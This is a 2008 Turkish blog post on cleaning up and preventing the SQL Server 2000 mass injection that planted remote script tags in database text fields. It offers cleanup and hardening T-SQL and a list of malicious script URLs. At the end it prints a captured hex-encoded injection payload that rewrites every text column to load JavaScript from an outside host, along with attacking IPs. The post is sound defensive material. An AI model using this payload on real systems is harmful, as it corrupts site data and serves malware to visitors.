6 Ekim 2008 Pazartesi

Sql server 2000 Sql Injection Saldirisindan Korunma

Son zamanlarda bu tur saldirilar iyice artti. Ozellikle javascript dosyasini tum tablolara yazan bu saldiriyi yediyseniz yapmaniz gerekenler ;

--
Bakınız: http://volkanaltan.blogspot.com/2008/10/aqtronix-webknight-application-firewall.html


--

Önce tablolarımızı temizleyelim;

DECLARE @String as nvarchar(100)
SET @String = '<script src="http://www.ujnc.ru/js.js"></script>'
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor
CURSOR FOR

select a.name,b.name from sysobjects a,syscolumns b

where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)

BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'], '''+@String+''', '''')')

FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor

DEALLOCATE Table_Cursor

--<script src="http://www.ujnc.ru/js.js"></script>
--<script src="http://www.mnbenio.ru/script.js"></script>
--<script src="http://www.pfd2.ru/ngg.js"></script>
--<script src="http://www.crtbond.com/ngg.js"></script>
--<script src="http://www.netr2.ru/script.js"></script>
--<script src="http://www.iopc4.ru/script.js"></script>
--<script src="http://www.ujnc.ru/js.js"></script>
--<script src="http://www.ncb2.ru/ngg.js"></script>
--<script src="http://www.b4so.ru/ngg.js"></script>
--<script src="http://www.ncb2.ru/ngg.js"></script>
--<script src="http://www.bts5.ru/ngg.js"></script>
--<script src="http://www.5kc3.ru/ngg.js"></script>
--<script src="http://www.jex5.ru/ngg.js"></script>
--<script src="http://www.jvke.ru/ngg.js"></script>
--<script src="http://www.90mc.ru/ngg.js"></script>
--<script src="http://www.kc43.ru/ngg.js"></script>
--<script src="http://www.adwbn.ru/ngg.js"></script>
--<script src="http://www.korfd.ru/ngg.js"></script>
--<script src="http://www.tertad.mobi/ngg.js"></script>
--<script src="http://www.4cnw.ru/ngg.js"></script>
--<script src="http://www.nudk.ru/ngg.js"></script>
--<script src="http://www.adwbn.ru/ngg.js"></script>
--<script src=http://www.jic2.ru/script.js></script>
--<script src=http://www.pkseio.ru/script.js></script>
--<script src=http://www.mnbenio.ru/script.js></script>
--<script src=http://www.rundll841.com/b.js></script>
--<script src=http://www.porttw.mobi/ngg.js></script>
--<script src=http://www.ncwc.ru/ngg.js></script>
--<script src=http://www.pfd2.ru/ngg.js></script>
--<script src=http://www.pfd2.ru/ngg.js></script>
--<script src=http://www.bsko.ru/ngg.js></script>
--<script src=http://www.nbh3.ru/js.js></script>
--<script src=http://www.jic2.ru/script.js></script>
--<script src=http://www.pkseio.ru/script.js></script>
--<script src=http://www.mnbenio.ru/script.js></script>


Yukardaki kod ile tablo tipi varchar olan bütün alanlarda aradığınız stringi bulup boşluk ile değiştiriyor.



Text alanlar içinse şunu yapmalısınız;



DECLARE @StrBin BINARY(16)
DECLARE @InsertPos INT
DECLARE @DeleteLen INT
DECLARE @TabloID int
DECLARE test_cursor CURSOR FOR
SELECT TabloID FROM tablo_name

OPEN test_cursor
FETCH NEXT FROM test_cursor INTO @TabloID
WHILE @@FETCH_STATUS = 0

BEGIN
SELECT @StrBin = TEXTPTR(Field),
@InsertPos = (CHARINDEX('<script src="http://www.64do.com/script.js"></script>', Field)-1),

@DeleteLen = len('<script src="http://www.64do.com/script.js"></script>')

FROM dbo.tablo_name

WHERE TableID = @TabloID
IF(@InsertPos <> -1)

BEGIN
UPDATETEXT dbo.tablo_name.Field
@StrBin
@InsertPos
@DeleteLen
WITH LOG
''

END
FETCH NEXT FROM test_cursor INTO @TabloID

END
CLOSE test_cursor
DEALLOCATE test_cursor


Böylece saldırının etkisini atlatmış olucaz.


Şimdi ise bunun olmaması için ne yapmamız gerektiğine bakalım;


Bütün veritabanlarında "public" rolü seçilidir. Bu rolde "sysobjects" tablosuna erişimi kaldırıyoruz.





DECLARE @Name_ as nvarchar(100)
DECLARE @SQL as nvarchar(1000)
DECLARE @Count AS INT
SET @Count = 0
DECLARE test_cursor CURSOR
FOR

SELECT name FROM master..sysdatabases WHERE status=16 AND name NOT IN ('master','model','msdb','tempdb') ORDER BY name -- pasif db listesini getirme

OPEN test_cursor


FETCH NEXT FROM test_cursor INTO @Name_

WHILE (@@FETCH_STATUS <> -1)--bitti mi ?
BEGIN
SET @SQL = '
use ['+@Name_+']
DENY Select ON [dbo].[sysobjects] TO [public] CASCADE
'

exec(@SQL)--system tablosuna erisimi durdurma

--SELECT @SQL
SET @Count = @Count +1--sayiyi artir
--SELECT @Name_
FETCH NEXT FROM test_cursor INTO @Name_
END
CLOSE test_cursor
DEALLOCATE test_cursor
SELECT @Count --sonucu goruntule


------------


Örnek saldırı kodları ve saldıran ip ler ;

';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

ip list;

125.119.158.57, 122.4.54.67, 74.13.127.182, 85.93.236.62

Hiç yorum yok: